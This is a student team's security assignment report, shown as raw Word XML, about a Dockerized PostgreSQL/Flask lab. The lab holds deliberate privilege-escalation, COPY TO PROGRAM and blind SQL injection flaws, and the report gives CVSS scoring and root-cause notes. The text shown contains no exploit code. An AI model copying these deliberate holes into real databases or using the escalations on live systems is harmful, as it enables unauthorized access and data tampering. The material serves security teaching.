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C81" w:rsidRPr="00705C2B" w:rsidRDefault="00CE55EE" w:rsidP="00CE55EE">
      <w:pPr>
        <w:jc w:val="center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705C2B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Database Security Assignment</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="554"/>
        <w:tblW w:w="9672" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4836"/>
        <w:gridCol w:w="4836"/>
      </w:tblGrid>
      <w:tr w:rsidR="0031438B" w:rsidTr="0031438B">
        <w:trPr>
          <w:trHeight w:val="710"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4836" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Team Members</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4836" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0031438B" w:rsidTr="0031438B">
        <w:trPr>
          <w:trHeight w:val="726"/>
        </w:trPr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Maryam Mohamed</w:t>
            </w:r>
          </w:p>
        </w:tc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20231700336</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0031438B" w:rsidTr="0031438B">
        <w:trPr>
          <w:trHeight w:val="708"/>
        </w:trPr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Aya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Elsayed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Hussein</w:t>
            </w:r>
          </w:p>
        </w:tc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20231700308</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0031438B" w:rsidTr="0031438B">
        <w:trPr>
          <w:trHeight w:val="798"/>
        </w:trPr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Yara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Tamer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Kamel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Yassin </w:t>
            </w:r>
          </w:p>
        </w:tc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20231700343</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0031438B" w:rsidTr="0031438B">
        <w:trPr>
          <w:trHeight w:val="807"/>
        </w:trPr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Kermina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Fady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Ayad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</w:p>
        </w:tc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20231700330</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0031438B" w:rsidTr="0031438B">
        <w:trPr>
          <w:trHeight w:val="798"/>
        </w:trPr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Hend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Mohamed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Matar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4836" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438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20231700342</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B"/>
    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B"/>
    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B"/>
    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B"/>
    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B"/>
    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B"/>
    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B"/>
    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B"/>
    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B"/>
    <w:p w:rsidR="0031438B" w:rsidRPr="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B"/>
    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009731C2" w:rsidRDefault="0031438B" w:rsidP="0031438B">
      <w:r>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031438B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Dockerized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031438B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CTF-style database security lab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> simulates realistic attacks against database systems and applications. It exposes direct PostgreSQL services and a vulnerable Flask web application. The three vulnerabilities are: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009731C2" w:rsidRDefault="0031438B" w:rsidP="0031438B">
      <w:r>
        <w:t>(1) SECURITY DEFINER privilege escalation (</w:t>
      </w:r>
      <w:r w:rsidR="009731C2">
        <w:t>High)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009731C2" w:rsidRDefault="0031438B" w:rsidP="0031438B">
      <w:r>
        <w:t>(2) CVE-2019-9193 COPY TO PROGRAM priv</w:t>
      </w:r>
      <w:r w:rsidR="009731C2">
        <w:t>ilege escalation (Critical)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B">
      <w:r>
        <w:t>(3) Blind SQL Injection against a Flask/PostgreSQL stack (High).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC08E9" w:rsidRDefault="0031438B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Environment Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC08E9" w:rsidRDefault="0031438B">
      <w:r w:rsidRPr="00A52DFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Architecture Overview:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A52DFA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The lab is fully containerized using </w:t>
      </w:r>
      <w:r w:rsidRPr="0031438B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Docker Compose</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and is launched using a single </w:t>
      </w:r>
      <w:r w:rsidRPr="0031438B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031438B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031438B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> compose up --build'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC08E9" w:rsidRPr="00A52DFA" w:rsidRDefault="0031438B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A52DFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Architecture Diagram (text-based):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0031438B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05A3FF8A" wp14:editId="45747102">
            <wp:extent cx="5943600" cy="451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C2" w:rsidRDefault="009731C2" w:rsidP="0031438B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0031438B" w:rsidRPr="00A52DFA" w:rsidRDefault="0031438B" w:rsidP="0031438B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A52DFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Container Roles and Ports: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4804"/>
        <w:gridCol w:w="1371"/>
        <w:gridCol w:w="1043"/>
      </w:tblGrid>
      <w:tr w:rsidR="0031438B" w:rsidRPr="0031438B" w:rsidTr="0031438B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0031438B" w:rsidRPr="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B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Container Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0031438B" w:rsidRPr="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B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Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0031438B" w:rsidRPr="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B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Internal Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0031438B" w:rsidRPr="0031438B" w:rsidRDefault="0031438B" w:rsidP="0031438B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Host Port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38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vuln1-security-definer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PostgreSQL instance vulnerable to SECURITY DEFINER abuse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5432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5433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38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vuln2-copy-to-program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PostgreSQL instance vulnerable to COPY TO PROGRAM abuse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5432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5434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1438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postgres-sqli-db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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PostgreSQL backend database for Blind SQL Injection application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5432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5435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38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blind-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0031438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sqli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0031438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-web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Flask web application vulnerable to Blind SQL Injection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5000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0031438B" w:rsidRPr="0031438B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1438B">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>5000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BC08E9" w:rsidRDefault="00BC08E9" w:rsidP="0031438B"/>
    <w:p w:rsidR="0031438B" w:rsidRPr="00A52DFA" w:rsidRDefault="0031438B" w:rsidP="0031438B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A52DFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Technologies and Versions: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1618"/>
        <w:gridCol w:w="3249"/>
      </w:tblGrid>
      <w:tr w:rsidR="0031438B" w:rsidRPr="0031438B" w:rsidTr="009731C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0031438B" w:rsidRPr="009731C2" w:rsidRDefault="0031438B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Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0031438B" w:rsidRPr="009731C2" w:rsidRDefault="0031438B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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0031438B" w:rsidRPr="009731C2" w:rsidRDefault="0031438B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Purpose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Docker Desktop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Latest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container runtime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Docker Compose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v2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orchestration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PostgreSQL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vuln1 + vuln3 backend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PostgreSQL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vuln2 (CVE reproduction)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Flask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latest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vulnerable web application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3.11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application runtime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GitHub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cloud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version control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0031438B" w:rsidRPr="0031438B" w:rsidTr="0031438B"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PowerShell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Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0031438B" w:rsidRPr="009731C2" w:rsidRDefault="0031438B" w:rsidP="003143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731C2">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>deployment/testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BC08E9" w:rsidRDefault="00BC08E9" w:rsidP="0031438B"/>
    <w:p w:rsidR="00705C2B" w:rsidRDefault="00705C2B" w:rsidP="00CE55EE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00705C2B" w:rsidRDefault="00705C2B" w:rsidP="00CE55EE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009731C2" w:rsidRDefault="006A6328" w:rsidP="009731C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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009731C2" w:rsidRPr="009731C2" w:rsidRDefault="009731C2" w:rsidP="009731C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9731C2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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Vulnerability 1: Security Definer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009731C2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( Privilege</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009731C2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 xml:space="preserve"> Escalation) </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1904" w:tblpY="467"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3055"/>
        <w:gridCol w:w="2610"/>
        <w:gridCol w:w="3685"/>
      </w:tblGrid>
      <w:tr w:rsidR="009731C2" w:rsidTr="00B67DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3055" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009731C2" w:rsidTr="00B67DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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Attack Vector (AV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610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Network (N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="368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Exploitable remotely over network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009731C2" w:rsidTr="00B67DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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Attack Complexity (AC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="368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The attacker need to know how to write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postgreSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009731C2" w:rsidTr="00B67DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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Privileges Required (PR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610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None (N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="368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 authentication needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009731C2" w:rsidTr="00B67DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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User Interaction (UI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610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Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="368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The attacker needs to run the function </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009731C2" w:rsidTr="00B67DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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Scope (S)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610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Changed (C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="368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Impacts database (different security domain)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009731C2" w:rsidTr="00B67DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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Confidentiality (C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610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High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="368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Can get information from the databases  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009731C2" w:rsidTr="00B67DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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Integrity (I)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610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Available </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="368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Can do a payload to modify data </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009731C2" w:rsidTr="00B67DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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Availability (A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610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Available </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009731C2" w:rsidRPr="007E1FD9" w:rsidRDefault="009731C2" w:rsidP="00B67D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Can run a code that shut down the DB/drop tables </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A52DFA" w:rsidRPr="009731C2" w:rsidRDefault="00A52DFA" w:rsidP="00A52DF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A6328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1.2 Base</w:t>
      </w:r>
      <w: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Score: 8 (HIGH)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009731C2" w:rsidRDefault="009731C2" w:rsidP="009731C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7D6A9A" w:rsidRPr="009731C2" w:rsidRDefault="007D6A9A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9731C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lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.3 Root Cause Analysis </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D6A9A" w:rsidRPr="00731E37" w:rsidRDefault="007D6A9A" w:rsidP="007D6A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Code Location : vuln</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D6A9A" w:rsidRPr="007D6A9A" w:rsidRDefault="00793B0C" w:rsidP="00793B0C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00793B0C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F6F085C" wp14:editId="11A0B453">
            <wp:extent cx="4762500" cy="5749929"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="128137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3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468" cy="577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A9A" w:rsidRPr="00B867F6" w:rsidRDefault="007D6A9A" w:rsidP="007D6A9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</w:t>
      </w:r>
      <w:r w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>t's vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> because:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00793B0C" w:rsidRPr="00793B0C" w:rsidRDefault="00793B0C" w:rsidP="00793B0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The attacker already made a payload inside a trusted/looks legitimate function which can be used daily by anyone, and it will always grant him </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>superuser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privileges </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D6A9A" w:rsidRPr="00731E37" w:rsidRDefault="00793B0C" w:rsidP="007D6A9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No search-path= (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>pg_catalog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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>pg_temp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) which will make </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Postgres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look in the trusted function and mitigate this type of vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D6A9A" w:rsidRPr="009731C2" w:rsidRDefault="00793B0C" w:rsidP="007D6A9A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9731C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1.4 </w:t>
      </w:r>
      <w:r w:rsidR="007D6A9A" w:rsidRPr="009731C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The Injection Point:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009731C2" w:rsidRPr="00B867F6" w:rsidRDefault="00793B0C" w:rsidP="00A52DF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>The user calling a function multiply</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00793B0C" w:rsidRPr="009731C2" w:rsidRDefault="00793B0C" w:rsidP="00793B0C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9731C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1.5 Impact Statement</w:t>
      </w:r>
    </w:p>
